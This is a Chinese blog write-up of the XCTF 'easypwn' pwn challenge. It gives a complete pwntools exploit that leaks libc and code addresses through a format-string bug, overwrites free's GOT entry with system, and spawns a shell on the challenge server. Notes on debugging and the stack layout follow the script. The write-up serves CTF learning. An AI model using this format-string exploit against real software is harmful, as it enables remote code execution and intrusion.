攻防世界easypwn

已于 2022-08-06 23:18:02 修改
阅读量481 收藏 1
点赞数
文章标签: python linux 开发语言
于 2022-08-01 01:55:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44447516/article/details/126092534
版权

看题目以为容易,结果进入看到是难度八分,不过先硬着头皮抄一下别人的writeup吧。首先上exp

from pwn import *

r = remote("61.147.171.105", 53146)
elf = ELF('./pwn1')
libc = ELF('./libc.so.6')
def echo(payload):
	print r.recvuntil("Input Your Code:\n")
	r.sendline('1')
	print r.recvuntil("Welcome To WHCTF2017:\n")	
	r.sendline(payload)

def setName(name):
	print r.recvuntil("Input Your Code:\n")
	r.sendline('2')
	print r.recvuntil("Input Your Name:\n")	
	r.sendline(name)

setName("1")

padding_num = 0x7f8 - 0x410
payload = 'a' * padding_num + 'bb%397$p'
echo(payload)
print r.recvuntil("0x")
main_return = int(r.recvuntil('\n').strip(), 16)
libc_base = (main_return - 0xF0) - libc.symbols['__libc_start_main']
system = libc_base + libc.symbols['system']
free = libc_base + libc.symbols['free']
print "system:", hex(system)
print "free:", hex(free)


payload = 'a' * padding_num + 'bb%396$p'
echo(payload)
print r.recvuntil("0x")
init_addr = int(r.recvuntil('\n').strip(), 16)
code_base = init_addr - 0xda0
print "code base:", hex(code_base)
free_got = code_base + elf.got['free']
print "free got:", hex(free_got)

num = (system & 0xFFFF) - padding_num - 0x16
print hex(num + padding_num)
payload = 'a' * padding_num + ('bb%' + str(num) + 'c%133$hn').ljust(16, 'a') + p64(free_got)
echo(payload)
num = ((system >> 16) & 0xFFFF) - padding_num - 0x16
print hex(num + padding_num)
payload = 'a' * padding_num + ('bb%' + str(num) + 'c%133$hn').ljust(16, 'a') + p64(free_got + 2)
echo(payload)
setName('/bin/sh')
r.interactive()

用python2跑一下,直接跑起来取得了shell,然后flag在哪里啊

首先动态调试,看了看函数执行顺序,
程序一开始执行就进入了start函数,
start调用libc里面的libc_start_main函数,把rpb入栈,rbp指向0007FFE9F36C8E8这个地址存了000055BAAF800D9F,是init函数的地址,开了EIP,所以地址会变但是后三位不变
libc_start_main函数调用init函数,init执行完又回到libc-start-main
libc-start-main函数调用main函数,main函数的返回地址___libc_start_main+F0,rbp就指向了init函数的起始地址(里面存的是代码,而不是一般main函数调用其他函数时候的栈底里面存的是参数之类的。),如果是单步调试的话,这里只会显示一个地址,不会显示与libc-start-main的相对位置。
所以main函数栈底的位置一般都是init函数和libc-start-main函数,利用这个就可以像writeup里面算出来函数和libc的基址。

(字符串的结尾是0a00)
第一次输入payload的时候,必须在1000个a后面加上bb再加%397$p,负责就不能输出地址,不知为什么

weixin_44447516
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WICCTF-2021-easypwn
05-12
2021津门杯ctf的第一道pwn题。
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界-PWN-new_easypwn
aptx4869_li的博客
07-31 2495
攻防世界的格式化字符串漏洞利用,简单题
攻防世界-Pwn-new-easypwn
wuh2333的博客
03-12 3743
攻防世界-Pwn-new-easypwn
new-easy(pwn)
m0_72827793的博客
03-12 1242
由于栈溢出攻击的主要目标通过溢出覆盖函数栈高位的返回地址,因此其思路是在函数开始执行前,即在返回地地址前写入一个字长的随机数据,在函数返回前校验该值是否被改变,如果被改变,则认为是发生了栈溢出。与ASLR保护十分类似,PIE保护的目的是让可执行程序ELF的地址进行随机化加载,从而使得程序的内存结构对攻击者完全未知,进一步提高程序的安全性。ASLR的目的是将程序的堆栈地址和动态链接库的加载地址进行一定的随机化,这些地址之间是不可读写执行的为映射内存,降低攻击者对程序内存结构的了解。
攻防世界PWN之EasyPwn题解
seaaseesa的博客
11-15 3670
EasyPwn 首先,看一下程序的保护机制 开启了CANARY、NX和PIE,RELRO部分开启,我们可以改写GOT表 然后,我们用IDA分析 read的maxsize参数比变量的空间大小要小,因此无法溢出到栈底,加上开启了PIE,因此排除了ROP的方法 我们再仔细观察一下,发现snprintf在执行的过程中,v2可以溢出到v3,而v3存储的是格式化字符串,因此,我们可以溢出v2...
攻防世界new-easypwn
DeMaJIKA的博客
12-02 226
这儿剋应用pwndbg来看代码,但是个人习惯用ida,先在linux里面运行一下试试功能。反正仙checksec检查下保护机制。
[BUUCTF]刷题记录-----roarctf_2019_easy_pwn
KaliLinux_V的博客
02-01 210
现在free chunk1它就会加入unsorted bin,然后再创建一个0x90大小的chunk,这是就会把chunk1给我们,然后再还原原来的chunk2。这样就伪造了两个chunk的大小,但在程序中储存的chunk1的size值不是0x90而是0x10,chunk2不是0x10而是0x90,即使chunk1现在是0xa1的大小,但只能编辑0x10的字节。edit函数中有个问题,就是编辑时输入的size减去添加时的size时的值为10时,可以多输入一个字节,纯在off-by-one漏洞。
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界Fakezip杂项
11-20
攻防世界Fakezip杂项】是一道网络安全领域中的挑战,属于攻防世界的Misc类问题。Misc( Miscellaneous)通常指的是涉及多种技术、需要综合运用知识的题目,这道题目的核心在于理解和处理压缩文件,特别是涉及到...
攻防世界running
11-15
攻防世界running杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127861757
攻防世界Check杂项
11-20
攻防世界Check杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127952250
easypwn
zip471642048的博客
12-01 274
esaypwn
roarctf_2019_easy_pwn
hanabi_sh
12-20 520
buuctf pwn roarctf_2019_easy_pwn off-by-one
Ichunqiu_Easypwn
钞sir的博客
01-28 4021
轮回池前彼岸花 三生石旁那道疤 擦不去的眼中莎 泪眼迷离失去她 https://cc-sir.github.io/2019/01/28/ichunqiu_easypwn/ 方法 这道题是i春秋CTF的一道题,也是“百度杯”CTF比赛 十二月场中的一道pwn,这道题比较简单 我们先看看这道题的保护机制: sir@sir-PC:~/desktop$ checksec easypwn [*] '/ho...
BUUCTF pwn wp 146 - 150
fa1c4的blog
04-30 544
hitcontraining_playfmt gwctf_2019_easy_pwn bctf2016_bcloud asis2016_b00ks warmup
2022赣育杯easypwn
qingan6的博客
11-14 205
2022赣育杯easypwn writeup
10.javaSE基础_JDBC编译程序(Driver+Statement+Connection+mysql数据库连接)
最新发布
m0_61086522的博客
07-02 1220
JDBC是的缩写。它是Sun的Javasoft公司制定的Java数据库连接技术,是一套标准接口java.sql包中提供了JDBC API,通过它连接到各种数据库系统,编写访问数据库的程序。JDBC API不能直接访问数据库,它依赖于数据库厂商提供的JDBC Driver(JDBC驱动程序)
攻防世界 easyphp
09-11
EasyPHP是一个用于Windows操作系统的开发环境,它集成了Apache服务器、MySQL数据库和PHP解释器,使得搭建和管理网站变得更加简单。在EasyPHP中,攻防世界是一个基于CTF(Capture The Flag)赛制的在线平台,旨在提供网络安全学习和竞赛的机会。 攻防世界平台上有各种不同的题目和挑战,涵盖了网络安全的多个方面,包括但不限于Web漏洞、系统漏洞、密码学等。参与者需要通过解决这些挑战来学习和提高自己的网络安全技能。同时,攻防世界也提供了一些教程和文章,帮助新手入门并引导他们深入理解攻击和防御的原理。 对于初学者来说,攻防世界的easyphp环境可以作为一个很好的起点,因为它提供了一个集成的开发环境,使得学习和实践变得更加方便。通过解决平台上的题目和挑战,初学者可以逐渐熟悉常见的安全漏洞和攻击技术,并学会如何进行相应的防御措施。 希望以上信息对你有所帮助!如果你有任何其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值